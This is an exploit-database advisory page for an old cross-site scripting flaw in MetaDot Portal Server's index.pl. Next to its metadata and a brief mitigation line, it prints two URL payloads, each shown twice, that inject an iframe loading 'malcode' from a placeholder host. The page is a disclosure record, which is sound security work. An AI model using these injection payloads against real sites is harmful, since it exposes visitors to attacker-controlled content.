header-logo
Suggest Exploit
vendor:
MetaDot Portal Server
by:
SecurityFocus
6,4
CVSS
MEDIUM
Cross-Site Scripting
79
CWE
Product Name: MetaDot Portal Server
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: YES
Related CWE: CVE-2002-1490
CPE: meta-dot-portal-server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2002

MetaDot Portal Server Cross-Site Scripting Vulnerability

MetaDot Corporation's MetaDot Portal Server is vulnerable to Cross-Site Scripting (XSS) attacks due to a failure to properly validate user input. An attacker can exploit this vulnerability by sending malicious code in the form of an iframe to the vulnerable server. For example, an attacker can send the following code to the vulnerable server: /index.pl?isa=XSS<iframe%20src=http://www.example.com/malcode> or /index.pl?iid='"><iframe%20src=http://www.exmaple.com/malcode>.

Mitigation:

To mitigate this vulnerability, MetaDot Corporation should ensure that user input is properly validated.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/9439/info
  
A number of vulnerabilities have been found in all version of MetaDot Corporation's MetaDot Portal Server. Due to a failure of the software to properly validate user input, an attacker may be able to corrupt data, force the server to disclose system configuration information or initiate cross-site scripting.

/index.pl?isa=XSS<iframe%20src=http://www.example.com/malcode>
/index.pl?iid='"><iframe%20src=http://www.exmaple.com/malcode>

Navigation

Suggest Exploit

Services By CQR